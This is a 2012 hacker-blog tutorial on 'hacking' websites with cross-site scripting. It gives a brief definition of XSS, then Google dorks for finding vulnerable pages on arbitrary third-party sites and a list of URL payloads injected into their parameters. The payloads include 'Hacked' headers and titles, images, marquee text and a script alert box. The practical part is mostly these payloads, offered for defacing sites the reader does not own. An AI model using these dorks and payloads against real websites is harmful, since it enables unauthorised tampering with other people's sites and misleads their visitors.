|Hacks|Crack|Tips |Tricks|Cracks |Programs|Tutorials |Movies|Games|

Breaking

Wednesday, October 31, 2012

2012 Tutorial! How To Hack A Websie Using XSS (Cross Site Scripting) Method? TuT By Chinmoy!

Demo Of XSS Site hacking.
Hello Friends Its Me Chinmoy Pratim Borah :)
In this tutorial i am going to teach you cross site scripting.
In short XSS.


  • Tutorial By :- Chinmoy Pratim Borah.
  • Host By :- Wild Wings Hackers.
  • Tutorial About :- Advanced Cross Site Scripting [[ For Noobs and Advanced Hackers ]]
  • Difficulty Level :- Medium.
  • Dork :-  inurl:"contentPage.php?id="
         
       inurl:"displayResource.php?id="
  • Browser Used :- Google Chrome.

Okay Now Let's Start!

1. What Is Cross Site Scripting?
Ans :- Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications, such as web browsers through breaches of browser security, that enables attackers toinject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007. Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.

2. What Type Of Cross Site Scripting Are There?
Ans :-  There are two types of Cross Site Scripting. They Are

1. Non-persistent

2. Persistent


-----------------------------------------------------------------------------
Steps.....

1. Go to Goole and type this XSS Dorks (Any 1 You can google for more)
inurl:"contentPage.php?id="
     
   inurl:"displayResource.php?id="
2. You get some results like : site.com/content.php?id=
3. To Check That The Site Is Vulnerable or not, we will add this script after '='
    <h1> Test </h1>
    Example :- site.com/content.php?id=<h1> test </h1>
if it will show you "Test" word in Header tag this Its Vulnerable.
As Shown In The Pic :-
Checking A Site To XSS Vul

To show Header
http://site.com/error.php?error=<h1>Hacked</h1>
To show header in center
http://site.com/error.php?error=<center><h1>Hacked</h1></center>
to show Title
http://site.com/error.php?error=<title>Hacked</title>
to Add a Image
http://site.comerror.php?error=<img src="http://yourimage link.com/-EtkPBc32dF0/UIgFEjw-cuI/AAAAAAAABGM/eIdp8Qg0hUg/s640/cats.jpg"/>
to add a Message 
http://site.com/error.php?error=<p><b>Your Message Here<b></p>
to write message in next lines
http://site.com/error.php?error=<p><b>First line<br>Second Line <b></p> 
To add a scrolling Text
http://site.com/error.php?error=<marquee>Scrolling text Here</marquee>
To Add a alert box 
http://site.com/error.php?error=<script>alert("hello");</script>
To add background colour in page
http://site.com/error.php?error=<body bgcolor="red"/>
___________________________________________________________

Note :- The Best Browser For Cross Site Scripting Are
          1. Google Chrome.
            2. Mozilla Firefox.
___________________________________________________________
IF you have any question you can freely ask me!! Just Comment You Question Below. 
Visitors please note that Anonymous Comments Are Enabled.Please Comment In Our Post! If You Comment We Like It !

No comments:

Post a Comment